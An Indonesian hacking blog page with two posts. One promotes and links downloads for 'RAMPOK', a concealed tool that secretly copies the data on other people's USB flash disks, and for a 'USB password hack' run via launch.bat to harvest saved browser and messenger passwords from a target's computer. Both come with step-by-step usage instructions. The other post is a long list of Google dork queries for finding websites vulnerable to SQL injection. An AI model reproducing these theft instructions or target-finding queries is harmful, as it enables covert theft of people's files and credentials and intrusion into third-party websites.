klik tombol Show Password
beres deh...

Senin, 09 Mei 2011

Software Mencuri data flash disk

bagaimana cara mengambil, merampok, mencuri, nyolong, ngehack data orang lain lewat USB flash disk tanpa sepengetahuan yang punya datanya. Ya maksudnya merampok data file orang lain. Cara ini bisa juga untuk mencuri password dan email orang lain. Penasaran?? simak lebih lanjut gih usilnya...





haha, asem neh orang, kalo diajak nyolong dan nyopet langsung nyelonong masuk aja.
Langsung ke maksudnya aja, Zatyabajaitem akan kasih tau 2 cara:

Yang pertama, software ini mempunyai fungsi mencuri data ketika ada USB flash disk yang di colokkan ke PC/laptop kamu, software ini bisa disetting, dan berjalan automatis ketika di colokkan. Dan data yang ada di flash disk itu akan dipindahkan (di-copy-kan) ke folder yang sudah kamu tujukan tanpa sepengetahuan yang punya flash disk. Hehe..mantab gan..
Nama software ini yaitu RAMPOK.

Software RAMPOK ini mempunyai fitur:
1. Menggunakan user dan password (digunakan untuk menutup aplikasi dan menonaktifkan kerja program).
2. Bisa startup program saat komputer dihidupkan.(bisa jalan secara automatis begitu PC dihidupkan)
3. Menggunakan button on/off untuk mengaktifkan dan menonaktifkan kerja program.
4. Bisa memilih alamat folder dan nama folder yang akan digunakan menampung hasil copy_an.
5. Rampok v2.0.exe tidak muncul dalam tasklist processes di task manager saat dijalankan. Aman dan tidak terdeteksi bagi yang oon dan gaptek..haha..upz..sory.

Cara menggunakan software rampok:

1. Software ini tanpa install, jadi seperti portable gitu. Tinggal klik aja.
2. Dan setting dulu software nya.
3. Tunggu mangsa yang bersedia di colokkan flash disk nya
4. Makan dan minum sambil menunggu data tercopy..kkkk

Dan cara yang kedua (2) yang akan Zatyabajaitem berikan yaitu sebaliknya dengan cara yang pertama. Sistemnya, kita akan mencuri, menghack data orang lain lewat USB flash disk. File ini Zatyabajaitem beri nama USB password hack.

Fitur pada USB password hack:
1. Dapat mengambil data yang tersimpan (ter-remember) di Internet Explore, dapat berupa data email dan password.
2. Data email yahoo.
3. Data messenger.
4. Data Firefox (yang telah ter-remember), dapat berupa email dan password)

Cara menggunakan USB password hack:

1. Masukan file folder USB password hack (dicopy) yang Zatyabajaitem berikan nanti dan masukan (paste) ke USB flash disk kamu.
2. Dan colokkan flash disk kamu ke komputer/laptop target.
3. Kemudian tekan/klik launch.bat
4. Dan password akan disimpan secara otomatis di flash disk kamu dalam format baru .TXT DOCUMENTS


NB: Untuk software rampok dan USB password hack hanya berlaku untuk OS XP, untuk vista lom pernah saya coba, dan untuk OS windows 7 tidak dapat jalan. Jadi sabar yah..hehe

Gunakan software tersebut dengan bijak, loh..kkkk... semoga keberuntungan selalu ada.







Silahkan Download

Rabu, 02 Maret 2011

Google Dork SQL Injection 2011

bagi yang lagi nyari dork sql injection update-an 2011 nih langsung aja...
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
semoga bermanfaat :P

ingat!!!!
hack to learn
NOT
learn to hack